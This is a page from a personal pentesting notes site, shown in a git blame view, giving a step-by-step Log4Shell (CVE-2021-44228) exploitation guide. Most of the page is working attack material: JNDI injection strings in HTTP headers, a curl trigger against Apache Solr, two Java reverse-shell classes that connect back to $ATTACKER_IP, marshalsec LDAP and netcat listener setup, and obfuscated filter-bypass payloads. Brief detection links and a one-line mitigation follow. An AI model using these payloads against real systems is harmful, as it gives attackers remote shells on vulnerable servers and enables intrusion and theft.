stefan
/
husk
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
husk/build/exploit/java/log4shell.html

329 lines
53 KiB
HTML
Raw Normal View History

init
2022-09-02 09:05:59 +02:00
<!doctype html>
<html lang="en">
<center>
<head>
<script src="https://cdn.jsdelivr.net/npm/fuse.js/dist/fuse.js"></script>
Added settings.toml
2022-09-09 15:41:05 +02:00
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script type="text/javascript" src="/static/js/auto-complete.js"></script>
<script type="text/javascript" src="/static/js/lunr.min.js"></script>
<script type="text/javascript" src="/static/js/search.js"></script>
init
2022-09-02 09:05:59 +02:00
<link rel="stylesheet" href="/static/stylesheet.css">
<link rel="stylesheet" href="/static/auto-complete.css">
<br>
Added settings.toml
2022-09-09 15:41:05 +02:00
<title>The Real Hugo</title>
init
2022-09-02 09:05:59 +02:00
<meta name="viewport" content="width=device-width, initial-scale=1">
</head>
<body>
<!-- topmenu -->
<div class="menu">
Added settings.toml
2022-09-09 15:41:05 +02:00
<a href="/" style="text-decoration:none">Husk</a>
init
2022-09-02 09:05:59 +02:00
</div>
<div class="search-container">
<label for="search-by"><i class="fas fa-search"></i></label>
<input data-search-input="" id="search-by" type="search" placeholder="Search..." autocomplete="off">
<!--button type="submit"><i class="search"></i>&#128269;</button>-->
<span data-search-clear=""><i class="fas fa-times"></i></span>
</div>
</div>
<div class="menu">
</div>
<!--br><br-->
</center>
<p></p>
<div class="columns">
<!-- Sidebar -->
<div class="column column-1">
Added settings.toml
2022-09-09 15:41:05 +02:00
<ul><details id=enumeration ontoggle="linkClick(this); return false;" ><summary>Enumeration</summary><ul><details id=containers ontoggle="linkClick(this); return false;" ><summary>Containers</summary><ul></ul></details><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/enumeration/docs/aws.html">aws</a></li><li><a href="/enumeration/docs/cewl.html">cewl</a></li><li><a href="/enumeration/docs/dns.html">dns</a></li><li><a href="/enumeration/docs/docker_enumeration.html">docker_enumeration</a></li><li><a href="/enumeration/docs/ffuf.html">ffuf</a></li><li><a href="/enumeration/docs/gobuster.html">gobuster</a></li><li><a href="/enumeration/docs/kerberoast.html">kerberoast</a></li><li><a href="/enumeration/docs/kubectl.html">kubectl</a></li><li><a href="/enumeration/docs/ldap.html">ldap</a></li><li><a href="/enumeration/docs/linux_basics.html">linux_basics</a></li><li><a href="/enumeration/docs/microk8s.html">microk8s</a></li><li><a href="/enumeration/docs/nfs.html">nfs</a></li><li><a href="/enumeration/docs/nikto.html">nikto</a></li><li><a href="/enumeration/docs/nmap.html">nmap</a></li><li><a href="/enumeration/docs/port_knocking.html">port_knocking</a></li><li><a href="/enumeration/docs/rpcclient.html">rpcclient</a></li><li><a href="/enumeration/docs/rsync.html">rsync</a></li><li><a href="/enumeration/docs/rustscan.html">rustscan</a></li><li><a href="/enumeration/docs/shodan.html">shodan</a></li><details id=snmp ontoggle="linkClick(this); return false;" ><summary>Snmp</summary><ul><li><a href="/enumeration/docs/snmp/onesixtyone.html">onesixtyone</a></li><li><a href="/enumeration/docs/snmp/snmpcheck.html">snmpcheck</a></li></ul></details><li><a href="/enumeration/docs/websites.html">websites</a></li><li><a href="/enumeration/docs/wfuzz.html">wfuzz</a></li><li><a href="/enumeration/docs/wpscan.html">wpscan</a></li></ul></details><details id=network_scanners ontoggle="linkClick(this); return false;" ><summary>Network_scanners</summary><ul></ul></details><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><li><a href="/enumeration/windows/bloodhound.html">bloodhound</a></li><li><a href="/enumeration/windows/event_log.html">event_log</a></li><li><a href="/enumeration/windows/manual_enum.html">manual_enum</a></li><li><a href="/enumeration/windows/powershell.html">powershell</a></li><li><a href="/enumeration/windows/rpcclient.html">rpcclient</a></li><li><a href="/enumeration/windows/sysinternals.html">sysinternals</a></li><li><a href="/enumeration/windows/sysmon.html">sysmon</a></li><li><a href="/enumeration/windows/vss.html">vss</a></li></ul></details></ul></details><details id=exploit ontoggle="linkClick(this); return false;" ><summary>Exploit</summary><ul><details id=CPUs ontoggle="linkClick(this); return false;" ><summary>CPUs</summary><ul><li><a href="/exploit/CPUs/meltdown.html">meltdown</a></li></ul></details><details id=binaries ontoggle="linkClick(this); return false;" ><summary>Binaries</summary><ul><li><a href="/exploit/binaries/Shellcode.html">Shellcode</a></li><li><a href="/exploit/binaries/aslr.html">aslr</a></li><details id=buffer_overflow ontoggle="linkClick(this); return false;" ><summary>Buffer_overflow</summary><ul><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/exploit/binaries/buffer_overflow/docs/amd64.html">amd64</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/amd64_instructions.html">amd64_instructions</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/buffer_overflow.html">buffer_overflow</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/cut_stack_in_half.html">cut_stack_in_half</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/pwntools_specifics.html">pwntools_specifics</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/ret_address_reuse.html">ret_address_reuse</a></li></ul></details><li><a href="/exploit/binaries/buffer_overflow/ropping.html">ropping</a></li></ul></details><details id=canary_bypass ontoggle="l
init
2022-09-02 09:05:59 +02:00
</ul>
</div>
<div class="column column-2">
<span class="body">
<style>pre { line-height: 125%; }
td.linenos .normal { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
span.linenos { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
td.linenos .special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
span.linenos.special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
.codehilite .hll { background-color: #2C3B41 }
.codehilite .c { color: #546E7A; font-style: italic } /* Comment */
.codehilite .err { color: #FF5370 } /* Error */
.codehilite .esc { color: #89DDFF } /* Escape */
.codehilite .g { color: #EEFFFF } /* Generic */
.codehilite .k { color: #BB80B3 } /* Keyword */
.codehilite .l { color: #C3E88D } /* Literal */
.codehilite .n { color: #EEFFFF } /* Name */
.codehilite .o { color: #89DDFF } /* Operator */
.codehilite .p { color: #89DDFF } /* Punctuation */
.codehilite .ch { color: #546E7A; font-style: italic } /* Comment.Hashbang */
.codehilite .cm { color: #546E7A; font-style: italic } /* Comment.Multiline */
.codehilite .cp { color: #546E7A; font-style: italic } /* Comment.Preproc */
.codehilite .cpf { color: #546E7A; font-style: italic } /* Comment.PreprocFile */
.codehilite .c1 { color: #546E7A; font-style: italic } /* Comment.Single */
.codehilite .cs { color: #546E7A; font-style: italic } /* Comment.Special */
.codehilite .gd { color: #FF5370 } /* Generic.Deleted */
.codehilite .ge { color: #89DDFF } /* Generic.Emph */
.codehilite .gr { color: #FF5370 } /* Generic.Error */
.codehilite .gh { color: #C3E88D } /* Generic.Heading */
.codehilite .gi { color: #C3E88D } /* Generic.Inserted */
.codehilite .go { color: #546E7A } /* Generic.Output */
.codehilite .gp { color: #FFCB6B } /* Generic.Prompt */
.codehilite .gs { color: #FF5370 } /* Generic.Strong */
.codehilite .gu { color: #89DDFF } /* Generic.Subheading */
.codehilite .gt { color: #FF5370 } /* Generic.Traceback */
.codehilite .kc { color: #89DDFF } /* Keyword.Constant */
.codehilite .kd { color: #BB80B3 } /* Keyword.Declaration */
.codehilite .kn { color: #89DDFF; font-style: italic } /* Keyword.Namespace */
.codehilite .kp { color: #89DDFF } /* Keyword.Pseudo */
.codehilite .kr { color: #BB80B3 } /* Keyword.Reserved */
.codehilite .kt { color: #BB80B3 } /* Keyword.Type */
.codehilite .ld { color: #C3E88D } /* Literal.Date */
.codehilite .m { color: #F78C6C } /* Literal.Number */
.codehilite .s { color: #C3E88D } /* Literal.String */
.codehilite .na { color: #BB80B3 } /* Name.Attribute */
.codehilite .nb { color: #82AAFF } /* Name.Builtin */
.codehilite .nc { color: #FFCB6B } /* Name.Class */
.codehilite .no { color: #EEFFFF } /* Name.Constant */
.codehilite .nd { color: #82AAFF } /* Name.Decorator */
.codehilite .ni { color: #89DDFF } /* Name.Entity */
.codehilite .ne { color: #FFCB6B } /* Name.Exception */
.codehilite .nf { color: #82AAFF } /* Name.Function */
.codehilite .nl { color: #82AAFF } /* Name.Label */
.codehilite .nn { color: #FFCB6B } /* Name.Namespace */
.codehilite .nx { color: #EEFFFF } /* Name.Other */
.codehilite .py { color: #FFCB6B } /* Name.Property */
.codehilite .nt { color: #FF5370 } /* Name.Tag */
.codehilite .nv { color: #89DDFF } /* Name.Variable */
.codehilite .ow { color: #89DDFF; font-style: italic } /* Operator.Word */
.codehilite .w { color: #EEFFFF } /* Text.Whitespace */
.codehilite .mb { color: #F78C6C } /* Literal.Number.Bin */
.codehilite .mf { color: #F78C6C } /* Literal.Number.Float */
.codehilite .mh { color: #F78C6C } /* Literal.Number.Hex */
.codehilite .mi { color: #F78C6C } /* Literal.Number.Integer */
.codehilite .mo { color: #F78C6C } /* Literal.Number.Oct */
.codehilite .sa { color: #BB80B3 } /* Literal.String.Affix */
.codehilite .sb { color: #C3E88D } /* Literal.String.Backtick */
.codehilite .sc { color: #C3E88D } /* Literal.String.Char */
.codehilite .dl { color: #EEFFFF } /* Literal.String.Delimiter */
.codehilite .sd { color: #546E7A; font-style: italic } /* Literal.String.Doc */
.codehilite .s2 { color: #C3E88D } /* Literal.String.Double */
.codehilite .se { color: #EEFFFF } /* Literal.String.Escape */
.codehilite .sh { color: #C3E88D } /* Literal.String.Heredoc */
.codehilite .si { color: #89DDFF } /* Literal.String.Interpol */
.codehilite .sx { color: #C3E88D } /* Literal.String.Other */
.codehilite .sr { color: #89DDFF } /* Literal.String.Regex */
.codehilite .s1 { color: #C3E88D } /* Literal.String.Single */
.codehilite .ss { color: #89DDFF } /* Literal.String.Symbol */
.codehilite .bp { color: #89DDFF } /* Name.Builtin.Pseudo */
.codehilite .fm { color: #82AAFF } /* Name.Function.Magic */
.codehilite .vc { color: #89DDFF } /* Name.Variable.Class */
.codehilite .vg { color: #89DDFF } /* Name.Variable.Global */
.codehilite .vi { color: #89DDFF } /* Name.Variable.Instance */
.codehilite .vm { color: #82AAFF } /* Name.Variable.Magic */
.codehilite .il { color: #F78C6C } /* Literal.Number.Integer.Long */</style>
<div class="column column-3">
<ul>
<li><a href="#log4shell">Log4Shell</a><ul>
<li><a href="#java-naming-and-directory-interface-jndi">Java Naming and Directory Interface JNDI</a></li>
<li><a href="#poc">POC</a></li>
<li><a href="#usage">Usage</a></li>
<li><a href="#detection">Detection</a></li>
<li><a href="#obfuscation">Obfuscation</a></li>
<li><a href="#mitgation">Mitgation</a></li>
</ul>
</li>
</ul>
</div>
<h1 id="log4shell">Log4Shell</h1>
<ul>
<li><code>log4j</code> &lt; version 2.15.0rc2</li>
<li><a href="https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java">CVE-2021-44228</a></li>
<li><a href="https://log4shell.huntress.com/">log4j vulnerability tester</a></li>
<li>
<p><a href="https://github.com/YfryTchsGD/Log4jAttackSurface">List of exploitable services</a></p>
</li>
<li>
<p>Code inside a <code>param</code> value is parsed and a <code>${payload}</code> will be executed, for example</p>
</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="si">${</span><span class="nv">sys</span><span class="p">:</span><span class="nv">os</span><span class="p">.name</span><span class="si">}</span>
<span class="si">${</span><span class="nv">sys</span><span class="p">:</span><span class="nv">user</span><span class="p">.name</span><span class="si">}</span>
<span class="si">${</span><span class="nv">log4j</span><span class="p">:</span><span class="nv">configParentLocation</span><span class="si">}</span>
<span class="si">${</span><span class="nv">ENV</span><span class="p">:</span><span class="nv">PATH</span><span class="si">}</span>
<span class="si">${</span><span class="nv">ENV</span><span class="p">:</span><span class="nv">HOSTNAME</span><span class="si">}</span>
<span class="si">${</span><span class="nv">java</span><span class="p">:</span><span class="nv">version</span><span class="si">}</span>
</code></pre></div>
<h2 id="java-naming-and-directory-interface-jndi">Java Naming and Directory Interface JNDI</h2>
<ul>
<li>Vulnerability can be exploited via <code>${jndi:ldap://&lt;attacker-IP&gt;/foo}</code></li>
</ul>
<h2 id="poc">POC</h2>
<div class="codehilite"><pre><span></span><code>curl <span class="s1">&#39;http://$TARGET:8983/solr/admin/cores?foo=?$\{jndi:ldap://$ATTACKER_IP:4449\}&#39;</span>
</code></pre></div>
<ul>
<li>Use HTTP header field as storage for payload or any other possible input field</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="err">X-Forwarded-For: ${jndi:ldap://$ATTACKER_IP:1389/foo}</span>
<span class="err">Accept: ${jndi:ldap://$ATTACKER_IP:1389/foo}</span>
<span class="err">X-Api-Version: ${jndi:ldap://$ATTACKER_IP:1389/foo}</span>
</code></pre></div>
<h2 id="usage">Usage</h2>
<ul>
<li>Fuzz endpoints to applicate the exploit on</li>
<li>Clone and build <a href="https://github.com/mbechler/marshalsec">marshallsec</a> via <code>mvn clean package -DskipTests</code></li>
<li>Java version should be the same as the one on the target</li>
<li>
<p>A Proxy LDAP server to an HTTP server is needed</p>
</li>
<li>
<p>Compile following Java reverse shell via <code>javac Exploit.java -source 8 -target 8</code> to Exploit.class</p>
</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="kd">public</span><span class="w"> </span><span class="kd">class</span> <span class="nc">Exploit</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kd">static</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">try</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">java</span><span class="p">.</span><span class="na">lang</span><span class="p">.</span><span class="na">Runtime</span><span class="p">.</span><span class="na">getRuntime</span><span class="p">().</span><span class="na">exec</span><span class="p">(</span><span class="s">&quot;nc -e /bin/bash $ATTACKER_IP 4449&quot;</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">catch</span><span class="w"> </span><span class="p">(</span><span class="n">Exception</span><span class="w"> </span><span class="n">e</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">e</span><span class="p">.</span><span class="na">printStackTrace</span><span class="p">();</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>or another one </p>
<div class="codehilite"><pre><span></span><code><span class="kn">import</span><span class="w"> </span><span class="nn">java.io.InputStream</span><span class="p">;</span><span class="w"></span>
<span class="kn">import</span><span class="w"> </span><span class="nn">java.io.OutputStream</span><span class="p">;</span><span class="w"></span>
<span class="kn">import</span><span class="w"> </span><span class="nn">java.net.Socket</span><span class="p">;</span><span class="w"></span>
<span class="kd">public</span><span class="w"> </span><span class="kd">class</span> <span class="nc">Exploit</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kd">static</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">String</span><span class="w"> </span><span class="n">host</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">&quot;$ATTACKER_IP&quot;</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">port</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">4711</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">String</span><span class="w"> </span><span class="n">cmd</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">&quot;/bin/sh&quot;</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">try</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">Process</span><span class="w"> </span><span class="n">p</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">new</span><span class="w"> </span><span class="n">ProcessBuilder</span><span class="p">(</span><span class="n">cmd</span><span class="p">).</span><span class="na">redirectErrorStream</span><span class="p">(</span><span class="kc">true</span><span class="p">).</span><span class="na">start</span><span class="p">();</span><span class="w"></span>
<span class="w"> </span><span class="n">Socket</span><span class="w"> </span><span class="n">s</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">new</span><span class="w"> </span><span class="n">Socket</span><span class="p">(</span><span class="n">host</span><span class="p">,</span><span class="w"> </span><span class="n">port</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">InputStream</span><span class="w"> </span><span class="n">pi</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">p</span><span class="p">.</span><span class="na">getInputStream</span><span class="p">(),</span><span class="w"> </span><span class="n">pe</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">p</span><span class="p">.</span><span class="na">getErrorStream</span><span class="p">(),</span><span class="w"> </span><span class="n">si</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">s</span><span class="p">.</span><span class="na">getInputStream</span><span class="p">();</span><span class="w"></span>
<span class="w"> </span><span class="n">OutputStream</span><span class="w"> </span><span class="n">po</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">p</span><span class="p">.</span><span class="na">getOutputStream</span><span class="p">(),</span><span class="w"> </span><span class="n">so</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">s</span><span class="p">.</span><span class="na">getOutputStream</span><span class="p">();</span><span class="w"></span>
<span class="w"> </span><span class="k">while</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">s</span><span class="p">.</span><span class="na">isClosed</span><span class="p">())</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">while</span><span class="w"> </span><span class="p">(</span><span class="n">pi</span><span class="p">.</span><span class="na">available</span><span class="p">()</span><span class="w"> </span><span class="o">&gt;</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="n">so</span><span class="p">.</span><span class="na">write</span><span class="p">(</span><span class="n">pi</span><span class="p">.</span><span class="na">read</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">while</span><span class="w"> </span><span class="p">(</span><span class="n">pe</span><span class="p">.</span><span class="na">available</span><span class="p">()</span><span class="w"> </span><span class="o">&gt;</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="n">so</span><span class="p">.</span><span class="na">write</span><span class="p">(</span><span class="n">pe</span><span class="p">.</span><span class="na">read</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">while</span><span class="w"> </span><span class="p">(</span><span class="n">si</span><span class="p">.</span><span class="na">available</span><span class="p">()</span><span class="w"> </span><span class="o">&gt;</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="n">po</span><span class="p">.</span><span class="na">write</span><span class="p">(</span><span class="n">si</span><span class="p">.</span><span class="na">read</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="n">so</span><span class="p">.</span><span class="na">flush</span><span class="p">();</span><span class="w"></span>
<span class="w"> </span><span class="n">po</span><span class="p">.</span><span class="na">flush</span><span class="p">();</span><span class="w"></span>
<span class="w"> </span><span class="n">Thread</span><span class="p">.</span><span class="na">sleep</span><span class="p">(</span><span class="mi">50</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">try</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">p</span><span class="p">.</span><span class="na">exitValue</span><span class="p">();</span><span class="w"></span>
<span class="w"> </span><span class="k">break</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">catch</span><span class="w"> </span><span class="p">(</span><span class="n">Exception</span><span class="w"> </span><span class="n">e</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">p</span><span class="p">.</span><span class="na">destroy</span><span class="p">();</span><span class="w"></span>
<span class="w"> </span><span class="n">s</span><span class="p">.</span><span class="na">close</span><span class="p">();</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">catch</span><span class="w"> </span><span class="p">(</span><span class="n">Exception</span><span class="w"> </span><span class="n">e</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<ul>
<li>Run the LDAP, HTTP and reverse shell</li>
</ul>
<div class="codehilite"><pre><span></span><code>java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer <span class="s2">&quot;http://</span><span class="nv">$ATTACKER_IP</span><span class="s2">:8000/#Exploit&quot;</span>
</code></pre></div>
<div class="codehilite"><pre><span></span><code>php -S <span class="m">0</span>.0.0.0:8000
</code></pre></div>
<div class="codehilite"><pre><span></span><code>nc -lvnp <span class="m">4449</span>
</code></pre></div>
<ul>
<li>Trigger via <code>curl 'http://$TARGET:8983/solr/admin/cores?foo=$\{jndi:ldap://$ATTACKER_IP:1389/Exploit\}'</code></li>
</ul>
<h2 id="detection">Detection</h2>
<ul>
<li><a href="https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes.git">Log4Shell-Hashes</a></li>
<li><a href="https://github.com/nccgroup/Cyber-Defence/tree/master/Intelligence/CVE-2021-44228">Vulnerable Class + Jar hashes</a></li>
<li><a href="https://www.reddit.com/r/sysadmin/comments/reqc6f/log4j_0day_being_exploited_mega_thread_overview/">reddit mega thread</a></li>
<li>
<p><a href="https://github.com/darkarnium/CVE-2021-44228">Yara rules</a></p>
</li>
<li>
<p>Parse logs for <code>jndi</code></p>
</li>
</ul>
<h2 id="obfuscation">Obfuscation</h2>
<ul>
<li>Possible bypasses are as follows</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="si">${${</span><span class="nv">env</span><span class="p">:</span><span class="nv">ENV_NAME</span><span class="k">:-</span><span class="nv">j</span><span class="si">}</span><span class="nv">ndi</span><span class="si">${</span><span class="nv">env</span><span class="p">:</span><span class="nv">ENV_NAME</span><span class="k">:-</span><span class="p">:</span><span class="si">}${</span><span class="nv">env</span><span class="p">:</span><span class="nv">ENV_NAME</span><span class="k">:-</span><span class="nv">l</span><span class="si">}</span><span class="nv">dap</span><span class="si">${</span><span class="nv">env</span><span class="p">:</span><span class="nv">ENV_NAME</span><span class="k">:-</span><span class="p">:</span><span class="si">}</span><span class="p">//attackerendpoint.com/</span><span class="si">}</span>
<span class="si">${${</span><span class="nv">lower</span><span class="p">:</span><span class="nv">j</span><span class="si">}</span><span class="nv">ndi</span><span class="p">:</span><span class="si">${</span><span class="nv">lower</span><span class="p">:</span><span class="nv">l</span><span class="si">}${</span><span class="nv">lower</span><span class="p">:</span><span class="nv">d</span><span class="si">}</span><span class="nv">a</span><span class="si">${</span><span class="nv">lower</span><span class="p">:</span><span class="nv">p</span><span class="si">}</span><span class="p">://attackerendpoint.com/</span><span class="si">}</span>
<span class="si">${${</span><span class="nv">upper</span><span class="p">:</span><span class="nv">j</span><span class="si">}</span><span class="nv">ndi</span><span class="p">:</span><span class="si">${</span><span class="nv">upper</span><span class="p">:</span><span class="nv">l</span><span class="si">}${</span><span class="nv">upper</span><span class="p">:</span><span class="nv">d</span><span class="si">}</span><span class="nv">a</span><span class="si">${</span><span class="nv">lower</span><span class="p">:</span><span class="nv">p</span><span class="si">}</span><span class="p">://attackerendpoint.com/</span><span class="si">}</span>
<span class="si">${${</span><span class="p">:</span><span class="k">:-</span><span class="nv">j</span><span class="si">}${</span><span class="p">:</span><span class="k">:-</span><span class="nv">n</span><span class="si">}${</span><span class="p">:</span><span class="k">:-</span><span class="nv">d</span><span class="si">}${</span><span class="p">:</span><span class="k">:-</span><span class="nv">i</span><span class="si">}</span><span class="p">:</span><span class="si">${</span><span class="p">:</span><span class="k">:-</span><span class="nv">l</span><span class="si">}${</span><span class="p">:</span><span class="k">:-</span><span class="nv">d</span><span class="si">}${</span><span class="p">:</span><span class="k">:-</span><span class="nv">a</span><span class="si">}${</span><span class="p">:</span><span class="k">:-</span><span class="nv">p</span><span class="si">}</span><span class="p">://attackerendpoint.com/z</span><span class="si">}</span>
<span class="si">${${</span><span class="nv">env</span><span class="p">:</span><span class="nv">BARFOO</span><span class="k">:-</span><span class="nv">j</span><span class="si">}</span><span class="nv">ndi</span><span class="si">${</span><span class="nv">env</span><span class="p">:</span><span class="nv">BARFOO</span><span class="k">:-</span><span class="p">:</span><span class="si">}${</span><span class="nv">env</span><span class="p">:</span><span class="nv">BARFOO</span><span class="k">:-</span><span class="nv">l</span><span class="si">}</span><span class="nv">dap</span><span class="si">${</span><span class="nv">env</span><span class="p">:</span><span class="nv">BARFOO</span><span class="k">:-</span><span class="p">:</span><span class="si">}</span><span class="p">//attackerendpoint.com/</span><span class="si">}</span>
<span class="si">${${</span><span class="nv">lower</span><span class="p">:</span><span class="nv">j</span><span class="si">}${</span><span class="nv">upper</span><span class="p">:</span><span class="nv">n</span><span class="si">}${</span><span class="nv">lower</span><span class="p">:</span><span class="nv">d</span><span class="si">}${</span><span class="nv">upper</span><span class="p">:</span><span class="nv">i</span><span class="si">}</span><span class="p">:</span><span class="si">${</span><span class="nv">lower</span><span class="p">:</span><span class="nv">r</span><span class="si">}</span><span class="nv">m</span><span class="si">${</span><span class="nv">lower</span><span class="p">:</span><span class="nv">i</span><span class="si">}}</span>://attackerendpoint.com/<span class="o">}</span>
<span class="si">${${</span><span class="p">:</span><span class="k">:-</span><span class="nv">j</span><span class="si">}</span><span class="nv">ndi</span><span class="p">:</span><span class="nv">rmi</span><span class="p">://attackerendpoint.com/</span><span class="si">}</span>
</code></pre></div>
<h2 id="mitgation">Mitgation</h2>
<ul>
<li><a href="https://solr.apache.org/security.html">Apache Solr security news</a></li>
<li>Add the following line to <code>solr.in.sh</code></li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="n">SOLR_OPTS</span><span class="o">=</span><span class="s">&quot;$SOLR_OPTS -Dlog4j2.formatMsgNoLookups=true&quot;</span><span class="w"></span>
<span class="mf">10.10.90.21210.10.90.212</span><span class="w"></span>
</code></pre></div>
</span>
</div>
</div>
<div id="footer">
<p></p>
<center>
&copy; Stefan Friese
</center>
</div>
<script>
Added settings.toml
2022-09-09 15:41:05 +02:00
function linkClick(obj) {
init
2022-09-02 09:05:59 +02:00
if (obj.open) {
Added settings.toml
2022-09-09 15:41:05 +02:00
//console.log('open');
init
2022-09-02 09:05:59 +02:00
if (sessionStorage.getItem(obj.id) && !(sessionStorage.getItem(obj.id) === "open")) {
sessionStorage.removeItem(obj.id);
}
Added settings.toml
2022-09-09 15:41:05 +02:00
sessionStorage.setItem(obj.id,"open");
console.log(obj.id);
init
2022-09-02 09:05:59 +02:00
} else {
Added settings.toml
2022-09-09 15:41:05 +02:00
//console.log('closed');
sessionStorage.removeItem(obj.id);
}
}
init
2022-09-02 09:05:59 +02:00
Added settings.toml
2022-09-09 15:41:05 +02:00
let _keys = Object.keys(sessionStorage);
if (_keys) {
for ( let i = 0; i < _keys.length; i++ ) {
document.getElementById(_keys[i])['open'] = 'open';
}
}
init
2022-09-02 09:05:59 +02:00
</script>
Added settings.toml
2022-09-09 15:41:05 +02:00
<script async src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML" type="text/javascript"></script>
init
2022-09-02 09:05:59 +02:00
<script type="text/x-mathjax-config">
Added settings.toml
2022-09-09 15:41:05 +02:00
MathJax.Hub.Config({
config: ["MMLorHTML.js"],
jax: ["input/TeX", "output/HTML-CSS", "output/NativeMML"],
extensions: ["MathMenu.js", "MathZoom.js"]
});
</script>
init
2022-09-02 09:05:59 +02:00
</body>
</html>